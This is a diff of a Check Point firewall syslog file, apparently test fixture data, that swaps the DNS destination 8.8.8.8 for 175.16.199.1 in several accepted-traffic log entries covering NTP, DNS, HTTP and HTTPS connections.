 <134>1 2020-03-29T17:28:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80dac1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50182"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:28:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dac1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50649"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -2917,7 +2917,7 @@
 <134>1 2020-03-29T17:28:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dace,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.27"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10074"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:28:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dacf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:28:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dacf,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58698"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:28:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61209"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T17:28:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"61209"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:28:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"62820"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10075"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T17:28:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63741"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T17:28:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80dad6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50136"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10076"; xlatesrc:"0.0.0.0"]
@@ -2935,75 +2935,75 @@
 <134>1 2020-03-29T17:30:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db39,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50655"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:30:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db39,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50656"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T17:30:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db44,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; log_delay:"1585503044"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48428"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54659"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503069"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54659"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503069"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db5d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"188.40.137.18"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49906"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:11Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80db5f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54553"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49455"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52854"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54553"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49455"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.30"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44762"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33948"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:31:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80db76,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503094"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33948"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
